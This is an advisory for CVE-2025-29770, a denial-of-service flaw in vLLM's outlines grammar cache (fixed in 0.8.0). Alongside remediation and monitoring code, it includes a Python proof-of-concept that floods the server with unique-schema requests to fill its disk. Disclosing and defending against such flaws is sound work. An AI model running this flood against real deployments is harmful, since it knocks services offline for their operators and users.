CVE-2025-29770
Severity: MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Description
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
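A minimal sketch of the request pattern described above, against vLLM's OpenAI-compatible server: each request carries a unique JSON schema and selects the outlines backend per request via extra_body, as the advisory describes. The base URL, model name, loop count, and the guided_json key are illustrative assumptions, not values from the advisory.

```python
# Hypothetical sketch of the described request pattern. Each request uses a
# unique JSON schema, so outlines compiles a new grammar and (pre-0.8.0)
# writes a new entry to its on-disk cache. NOT a definitive reproduction.
from openai import OpenAI

# Placeholder endpoint and credentials for a local vLLM deployment.
client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

for i in range(1000):
    # A unique property name per request yields a unique schema,
    # and therefore a distinct grammar cache entry.
    schema = {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
        "required": [f"field_{i}"],
    }
    client.chat.completions.create(
        model="my-model",  # placeholder model name
        messages=[{"role": "user", "content": "hi"}],
        max_tokens=1,  # very short decode keeps each request cheap
        extra_body={
            # Force outlines even if another backend is the server default,
            # using the key named in the advisory.
            "guided_decoding_backend": "outlines",
            # Assumed vLLM extra_body key for supplying the schema.
            "guided_json": schema,
        },
    )
```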
Analysis
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable with low attack complexity, requires only low-privileged access, and needs no user interaction. As an Allocation of Resources Without Limits flaw, it lets an attacker exhaust filesystem space through uncontrolled cache growth, causing a denial of service.
Technical Context
This vulnerability is classified as Allocation of Resources Without Limits (CWE-770). As detailed in the description above, the affected code in vllm/model_executor/guided_decoding/outlines_logits_processors.py unconditionally uses outlines' on-disk grammar cache, so every request with a unique schema adds a new cache entry with no size bound; a stream of very short requests with unique schemas can fill the filesystem. Configuring a different default backend does not prevent exploitation, because outlines can still be selected per request via the guided_decoding_backend key of the extra_body field. The issue applies only to the V0 engine and is fixed in vLLM 0.8.0.
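For illustration only, and not vLLM's or outlines' actual patch: the general remedy for CWE-770 is to bound attacker-influenced allocation, for example with an eviction-based cache capped at a fixed number of entries.

```python
# Illustrative bounded LRU cache showing the general CWE-770 remedy:
# growth is capped, so unique attacker-supplied keys cannot expand
# storage without limit. This is a sketch, not the vLLM fix.
from collections import OrderedDict


class BoundedCache:
    def __init__(self, max_entries: int = 1024):
        self.max_entries = max_entries
        self._store = OrderedDict()  # key -> cached value, LRU-ordered

    def get(self, key):
        if key in self._store:
            self._store.move_to_end(key)  # mark as recently used
            return self._store[key]
        return None

    def put(self, key, value):
        self._store[key] = value
        self._store.move_to_end(key)
        # Evict the least recently used entry once the bound is hit.
        if len(self._store) > self.max_entries:
            self._store.popitem(last=False)
```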
Affected Products
vLLM.
Remediation
A vendor patch is available: upgrade to vLLM 0.8.0 or later as soon as possible. As defense in depth, enforce filesystem quotas on the host serving the cache, rate-limit structured-output (guided decoding) requests, and monitor disk usage of the cache location.
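As an operational stopgap for deployments that cannot upgrade immediately, the cache location can be watched so operators are alerted before the filesystem fills. A minimal sketch, assuming outlines honors the OUTLINES_CACHE_DIR environment variable; the default path and the 1 GiB budget are assumptions to tune per deployment.

```python
# Hedged operational sketch: warn when the outlines cache directory
# exceeds a byte budget. Path and budget are deployment assumptions.
import os
from pathlib import Path

CACHE_DIR = Path(
    os.environ.get("OUTLINES_CACHE_DIR", os.path.expanduser("~/.cache/outlines"))
)
MAX_BYTES = 1 * 1024 ** 3  # assumed 1 GiB budget


def cache_size_bytes(root: Path) -> int:
    # Sum the sizes of all regular files under the cache directory.
    return sum(p.stat().st_size for p in root.rglob("*") if p.is_file())


if CACHE_DIR.exists() and cache_size_bytes(CACHE_DIR) > MAX_BYTES:
    print(f"WARNING: outlines cache at {CACHE_DIR} exceeds {MAX_BYTES} bytes")
```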